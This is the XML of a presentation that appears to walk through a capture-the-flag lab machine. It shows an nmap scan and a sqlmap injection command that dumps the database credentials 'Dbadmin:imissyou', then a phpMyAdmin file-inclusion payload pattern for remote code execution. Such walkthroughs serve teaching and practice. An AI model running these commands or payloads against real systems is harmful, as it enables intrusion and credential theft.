              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D96AE7E4-C94B-CD41-B5E7-1D59D3219A36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6203620" y="2543816"/>
            <a:ext cx="3000260" cy="1311491"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70929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0">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B13E5A2F-87CE-4402-B004-17FC8414E070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="35000"/>
          </a:blip>
          <a:srcRect t="5866" b="9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0F484F70-4345-2E43-B28C-DD2BD1443C5E}"/>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Let’s Hack!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Connector 22">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angle 24">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37456744"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scanning</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5923721" cy="3331104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Scanning</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nmap</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sC</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sV</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oN</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jarvis.nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 10.10.10.143</a:t>
            </a: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713020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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scanning</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5923721" cy="3700290"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Scanning</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nmap</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sC</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sV</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oN</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jarvis.nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 10.10.10.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Dirbuster</a:t>
            </a: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15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7FDD8D0-DA89-8744-8211-1AA9DBE082FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5039362" y="1782537"/>
            <a:ext cx="7022308" cy="4469567"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Oval 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{204C423C-91B8-7946-B03C-9F80DD50A17B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7073900" y="4762500"/>
            <a:ext cx="1231900" cy="3302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C242F640-1B0A-8C4E-95E1-E884D197C364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5039362" y="2209800"/>
            <a:ext cx="1399538" cy="411341"/>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27479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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scanning</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5923721" cy="6353704"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Scanning</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nmap</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sC</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sV</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oN</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jarvis.nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 10.10.10.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Dirbuster</a:t>
            </a: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Discovered /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>phpmyadmin</a:t>
            </a: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15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7FDD8D0-DA89-8744-8211-1AA9DBE082FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5039362" y="1782537"/>
            <a:ext cx="7022308" cy="4469567"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Oval 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{204C423C-91B8-7946-B03C-9F80DD50A17B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7073900" y="4762500"/>
            <a:ext cx="1231900" cy="3302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C242F640-1B0A-8C4E-95E1-E884D197C364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5039362" y="2209800"/>
            <a:ext cx="1399538" cy="411341"/>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4037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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting</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5923721" cy="4016904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>While looking around we notice</a:t>
            </a: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7FCD9B37-5B30-7442-8A95-923A3C134B23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5231958" y="1502222"/>
            <a:ext cx="5084231" cy="840928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15215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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting</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6858442" cy="4016904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>While looking around we notice</a:t>
            </a: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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Let’s try SQL Injection</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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –password –-delay 2 –random-agent –u http://10.10.10.143/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>room.php?cod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=2</a:t>
            </a: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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Using –password because we want to access /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>phpmyadmin</a:t>
            </a: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7FCD9B37-5B30-7442-8A95-923A3C134B23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5231958" y="1502222"/>
            <a:ext cx="5084231" cy="840928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3444163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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting</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6858442" cy="6252104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>While looking around we notice</a:t>
            </a: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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Let’s try SQL Injection</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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –password –-delay 2 –random-agent –u http://10.10.10.143/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>room.php?cod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=2</a:t>
            </a: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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Using –password because we want to access /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>phpmyadmin</a:t>
            </a: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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Discovered Username and PW for database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Dbadmin:imissyou</a:t>
            </a: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7FCD9B37-5B30-7442-8A95-923A3C134B23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5231958" y="1502222"/>
            <a:ext cx="5084231" cy="840928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4033538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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting</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6858442" cy="6252104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>phpmyadmin</a:t>
            </a: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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>We notice the version and look it up</a:t>
            </a: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4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A94EBE0-7C57-6B40-9898-DFBD095A276D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7795081" y="412750"/>
            <a:ext cx="3302000" cy="977900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="600782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94495-E6A2-F94D-AD68-0B703F8B5837}"/>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8000">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DO NOT TRY THIS AT WORK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Graphic 26" descr="Irritant">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC9B23CC-EEDC-4C19-B228-1269EAF9D3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973" y="1790485"/>
            <a:ext cx="2758331" cy="2758331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="Straight Connector 35">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816D44C-5F7C-41A5-BDC7-B2ADF0414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17891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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRP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6858442" cy="6252104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>phpmyadmin</a:t>
            </a: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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>We notice the version and look it up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Summary:</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The PHP code on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> will include any file passed in as a “target” variable. It validates it by checking against a whitelist but can be bypassed by adding something from the whitelist. This makes our payload:</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index.php?target</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sql.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?/path/to/file/to/include</a:t>
            </a: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4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A94EBE0-7C57-6B40-9898-DFBD095A276D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7795081" y="412750"/>
            <a:ext cx="3302000" cy="977900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40793466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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRP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6858442" cy="6252104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>phpmyadmin</a:t>
            </a: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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>We notice the version and look it up</a:t>
            </a:r>
